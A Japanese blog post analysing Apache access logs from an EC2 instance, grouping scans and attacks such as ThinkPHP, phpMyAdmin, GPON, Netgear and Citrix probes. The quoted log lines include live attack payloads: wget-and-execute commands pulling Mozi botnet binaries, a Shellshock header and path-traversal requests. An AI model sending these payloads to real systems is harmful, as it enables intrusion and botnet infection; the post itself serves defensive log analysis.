はじめに
バイト先のAWSアカウントでEC2インスタンスを立ち上げて数週間後...
暇だったのでEC2内のApacheのログを見てみたらハニーポット化していてびっくり.
少し攻撃ログを調べてみました.
よくある攻撃
#1 ThinkPHPの脆弱性を利用した攻撃
中国🇨🇳の白銀市(Baiyin)という超ど田舎なところや北京など中国のあらゆる場所からきていた攻撃.
117.157.15.27 - - [12/Jan/2020:05:36:57 +0000] "GET /TP/public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:36 +0000] "GET /TP/public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:37 +0000] "GET /TP/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:38 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:38 +0000] "GET /html/public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:38 +0000] "GET /public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:39 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:39 +0000] "GET /elrekt.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:39 +0000] "GET /index.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
134.175.147.53 - - [13/Jan/2020:06:16:39 +0000] "GET / HTTP/1.1" 200 1609 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
ThinkPHPといった中国で人気なPHPフレームワークの脆弱性をついた攻撃.40000台を超えるサーバーがThinkPHPを実行しているらしい.
フレームワークのinvokeFunctionメソッドの脆弱性を利用して、基礎となるサーバーで悪意のあるコードを実行するという.(参考)
毎日違うIPからこの種の攻撃がきてる.
#2 SSL関係
50.77.188.225 - - [12/Jan/2020:07:11:36 +0000] "\x03" 400 226 "-" "-"
134.209.247.103 - - [12/Jan/2020:09:27:00 +0000] "\x16\x03\x01\x02" 400 226 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:33 +0000] "\x16\x03\x01" 400 226 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:34 +0000] "\x16\x03\x01" 400 226 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:34 +0000] "\x16\x03\x01" 400 226 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:34 +0000] "\x16\x03\x01" 400 226 "-" "-"
SSL設定を行なっていないか,何らかの要因でSSL設定が間違っている際にSSL接続しようとした時に残るアクセスログ.
#3 AWS Security Scannerによるスキャン行為
44.224.22.196 - - [12/Jan/2020:13:32:30 +0000] "GET http://example.com/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:30 +0000] "GET http://169.254.169.254/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:30 +0000] "GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:30 +0000] "GET http://169.254.169.254/latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:30 +0000] "GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:31 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:31 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:31 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:31 +0000] "GET /latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [12/Jan/2020:13:32:32 +0000] "GET /latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:19 +0000] "GET http://example.com/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:19 +0000] "GET http://169.254.169.254/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:20 +0000] "GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:20 +0000] "GET http://169.254.169.254/latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:20 +0000] "GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:20 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:20 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:21 +0000] "GET / HTTP/1.1" 200 1609 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:21 +0000] "GET /latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
44.224.22.196 - - [13/Jan/2020:01:38:21 +0000] "GET /latest/dynamic/instance-identity/document HTTP/1.1" 404 196 "-" "AWS Security Scanner"
AWS Security ScannerというUser Agentによるアメリカ🇺🇸からのログが毎日残っていた. IPもAWSとなっていてAWSのサービスの何かかと思ったけど調べても出てこない.
#4 CONNECT
222.186.19.221 - - [12/Jan/2020:10:20:46 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
44.224.22.196 - - [12/Jan/2020:13:32:32 +0000] "CONNECT 52.194.249.42:80 HTTP/1.0" 405 224 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:32 +0000] "CONNECT 52.194.249.42:80 HTTP/1.0" 405 224 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:32 +0000] "CONNECT 52.194.249.42:80 HTTP/1.0" 405 224 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:33 +0000] "CONNECT 52.194.249.42:80 HTTP/1.0" 405 224 "-" "-"
44.224.22.196 - - [12/Jan/2020:13:32:33 +0000] "CONNECT 52.194.249.42:80 HTTP/1.0" 405 224 "-" "-"
222.186.19.221 - - [14/Jan/2020:04:22:55 +0000] "CONNECT ip.ws.126.net:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
221.213.75.23 - - [30/Dec/2019:19:53:32 +0000] "CONNECT www.baidu.com:443 HTTP/1.1" 405 224 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
124.90.55.2 - - [30/Dec/2019:19:53:32 +0000] "CONNECT www.voanews.com:443 HTTP/1.1" 405 224 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
110.177.82.208 - - [30/Dec/2019:19:53:33 +0000] "GET http://www.minghui.org/ HTTP/1.1" 200 1758 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
124.88.112.202 - - [30/Dec/2019:19:53:34 +0000] "CONNECT www.ipip.net:443 HTTP/1.1" 405 224 "-" "PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3"
CONNECTメソッドを用いて攻撃を試みようとしてきた際のログも非常に多い.CONNECT メソッドは通常,プロキシサーバを介してHTTPS通信する際に,通信内容を転送するために利用される.
#5 pmaの場所を探る攻撃
211.20.26.159 - - [12/Jan/2020:19:03:13 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
95.131.238.11 - - [15/Jan/2020:02:07:22 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 196 "-" "ZmEu"
95.131.238.11 - - [15/Jan/2020:02:07:22 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
95.131.238.11 - - [15/Jan/2020:02:07:23 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
95.131.238.11 - - [15/Jan/2020:02:07:23 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
95.131.238.11 - - [15/Jan/2020:02:07:24 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
95.131.238.11 - - [15/Jan/2020:02:07:24 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
146.71.79.95 - - [15/Jan/2020:02:55:29 +0000] "GET /muieblackcat HTTP/1.1" 404 196 "-" "-"
146.71.79.95 - - [15/Jan/2020:02:55:30 +0000] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "-"
146.71.79.95 - - [15/Jan/2020:02:55:30 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "-"
146.71.79.95 - - [15/Jan/2020:02:55:30 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 404 196 "-" "-"
146.71.79.95 - - [15/Jan/2020:02:55:30 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "-"
146.71.79.95 - - [15/Jan/2020:02:55:31 +0000] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "-"
213.23.12.149 - - [15/Jan/2020:02:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 196 "-" "ZmEu"
213.23.12.149 - - [15/Jan/2020:02:56:02 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
213.23.12.149 - - [15/Jan/2020:02:56:03 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
213.23.12.149 - - [15/Jan/2020:02:56:03 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
213.23.12.149 - - [15/Jan/2020:02:56:04 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
213.23.12.149 - - [15/Jan/2020:02:56:05 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 196 "-" "ZmEu"
63.247.65.162 - - [28/Dec/2019:14:04:09 +0000] "GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin HTTP/1.1" 404 196 "-" "python-requests/2.22.0"
202.152.41.154 - - [03/Jan/2020:18:03:34 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
2行目の, "w00tw00t"って何だろうって思って調べたら, あるHacker Goup が使っていたKeyWordらしい. これ自体ファイルを探っているわけではなく,「●●参上!」的なシグネチャらしい.
中段にある "muieblackcat"も,phpMyAdminやsetup.phpを探るbotの足跡.
#6 EC2インスタンスメタデータ
199.249.230.79 - - [12/Jan/2020:19:58:08 +0000] "GET http://169.254.169.254/latest/meta-data/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://wws.baidu.com/search/spider.html)"
#7 PHPStorm関係
193.57.40.46 - - [12/Jan/2020:21:32:33 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1609 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
PHPStorm + Xdebug というツールにおいて、ステップ処理を行うクエリらしい.
#8 Tomcat系
60.191.66.222 - - [13/Jan/2020:01:26:24 +0000] "GET /manager/html HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
159.203.197.169 - - [16/Jan/2020:04:55:55 +0000] "GET /manager/text/list HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
一行目:ミドルウェアであるTomcatの設定不備の探査攻撃.Tomcatのアクセス制限が不十分であるとTomcat上のアプリケーションを不正に操作されたり,不正なファイルアップロードされる可能性があり得る.
二行目:これもTomcatの調査を行う
#9 クローラ向け設定ファイル等
94.102.49.193 - - [13/Jan/2020:10:51:48 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "-"
80.82.77.139 - - [28/Dec/2019:14:31:57 +0000] "GET /robots.txt HTTP/1.1" 404 196 "-" "-"
80.82.77.139 - - [28/Dec/2019:14:31:57 +0000] "GET /sitemap.xml HTTP/1.1" 404 196 "-" "-"
80.82.77.139 - - [28/Dec/2019:14:31:57 +0000] "GET /.well-known/security.txt HTTP/1.1" 404 196 "-" "-"
80.82.77.139 - - [28/Dec/2019:14:31:58 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "python-requests/2.13.0"
robots.txtは検索クローラ向けの設定ファイル. このファイルが攻撃者に収集されるとディレクトリ構造が把握される可能性があるがそこまで深刻な被害は受けなさそう.
#10 アプリケーションレイヤースキャナー
171.67.70.102 - - [13/Jan/2020:20:44:21 +0000] "GET / HTTP/1.1" 200 1609 "-" "Mozilla/5.0 zgrab/0.x"
171.67.70.102 - - [13/Jan/2020:20:44:23 +0000] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
#11 shell
222.188.149.62 - - [14/Jan/2020:06:11:14 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 196 "-" "Hello, world"
Shell Command Execution(参考)
#12 CGI
5.178.87.50 - - [02/Jan/2020:00:02:19 +0000] "GET // HTTP/1.1" 200 1758 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [02/Jan/2020:00:02:19 +0000] "GET //cgi-sys/realsignup.cgi HTTP/1.1" 404 196 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [02/Jan/2020:00:02:20 +0000] "GET //cgi-bin/test-cgi HTTP/1.1" 404 196 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
5.178.87.50 - - [02/Jan/2020:00:02:20 +0000] "GET //cgi-bin/test.cgi HTTP/1.1" 404 196 "-" "() { :;};echo; /bin/bash -c \" echo 2014 | md5sum\""
面白いと思った攻撃
#1 GPONルータの脆弱性を利用した攻撃
韓国🇰🇷のソウル辺りからきていた攻撃.User AgentがHello, worldになってる.
220.124.192.225 - - [12/Jan/2020:12:53:23 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 196 "-" "Hello, World"
GPONルータという光通信規格「Gigabit Passive Optical Network(GPON)」を利用した家庭用ルータの脆弱性(CVE-2018-10561)を狙う攻撃.GPONルータの脆弱性としてCVE-2018-10562もある.
数年前流行ってたMiraiの亜種らしい.これら脆弱性を利用することにより,危機への侵入とRCE(遠隔でのコード実行)が可能となる.
#2 Gh0st RAT
66.240.205.34 - - [14/Jan/2020:06:06:33 +0000] "Gh0st\xad" 400 226 "-" "-"
HTTPリクエストメソッドが欠けているのが特徴.Gh0st RATといって感染した端末から攻撃者が用意したC2サーバへ接続し,攻撃者が遠隔操作することができる機能を持つものがある.
恐らく,そのGh0st RATがC2サーバに対して発した通信である. 調査通信であって直接の攻撃ではない.
#3 Netgearへの攻撃
175.4.245.133 - - [15/Jan/2020:03:14:08 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 196 "-" "-"
中国🇨🇳の郴州という湖南省にある地域から来ている攻撃.
Netgear DGNデバイスの脆弱性を突く攻撃です.
#4 ロードバランサへの攻撃
216.144.251.86 - - [16/Jan/2020:05:57:34 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 196 "-" "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
割とナウい脆弱性をついた攻撃をいただきました.(CVE-2019-19781)
この脆弱性により,Citrix社のロードバランサであるNetScalerで認証を必要とせずにリモートから任意のコードを実行される危険性がある.
その他よくわからないが頻出のログ
88.34.126.171 - - [12/Jan/2020:05:45:15 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7;" 400 226 "-" "-"
88.35.91.254 - - [14/Jan/2020:01:46:27 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7;" 400 226 "-" "-"
217.61.111.14 - - [13/Jan/2020:07:39:59 +0000] "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1" 404 196 "http://52.194.249.42/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
171.67.70.102 - - [13/Jan/2020:20:44:18 +0000] "\n" 400 226 "-" "-"
95.110.201.99 - - [28/Dec/2019:17:08:56 +0000] "GET /api/.env?0=0 HTTP/1.0" 404 196 "-" "DataCha0s/2.0"
104.248.163.158 - - [28/Dec/2019:17:16:58 +0000] "GET / HTTP/1.0" 200 1758 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
95.110.201.99 - - [28/Dec/2019:17:17:54 +0000] "GET /backup?0=0 HTTP/1.0" 404 196 "-" "DataCha0s/2.0"
109.205.243.8 - - [28/Dec/2019:04:07:07 +0000] "GET ../../mnt/custom/ProductDefinition HTTP" 400 226 "-" "-"
124.82.19.163 - - [28/Dec/2019:03:34:17 +0000] "POST /editBlackAndWhiteList HTTP/1.1" 404 196 "-" "ApiTool"
95.110.201.99 - - [04/Jan/2020:19:23:48 +0000] "GET /.env?z=z HTTP/1.0" 404 196 "-" "DataCha0s/2.0"
79.58.229.2 - - [04/Jan/2020:19:40:35 +0000] "GET /shell?busybox HTTP/1.1" 400 226 "-" "Mozilla/5.0"
::1 - - [04/Jan/2020:11:49:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.41 () (internal dummy connection)"
::1 - - [04/Jan/2020:11:49:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.41 () (internal dummy connection)"
感想
- もちろんバックリンクを調べに来るようなクローラーもちょいちょいいたが,攻撃っぽいlogの方が多かった.
- よくわからないものが多すぎる